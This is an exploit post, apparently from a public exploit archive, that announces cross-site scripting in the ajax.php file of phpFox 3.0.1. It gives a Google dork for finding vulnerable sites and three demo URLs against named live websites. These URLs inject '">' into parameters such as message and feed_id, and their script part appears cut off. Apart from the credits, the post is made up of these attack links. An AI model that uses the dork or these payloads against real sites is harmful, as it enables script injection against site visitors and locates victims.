# Exploit Title: phpFox Version 3.0.1 Cross site Scripting Vulnerability
#
# Google Dork: Intext:"Powered By phpFox Version 3.0.1"
#
# Date: 09/04/2012
#
# Author: Crim3R & Ajax Security Team
#
# Home : Http://WwW.AjaxTm.com/
#
# Vendor Home : http://www.phpfox.com/
#
# Tested on: all
#
==================================
[+] There is a lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title & ...
D3m0:
http://buddymahal.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=">&width=300
http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=">&item_id=518&_=1346525603467
http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518">&_=1346525603467
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369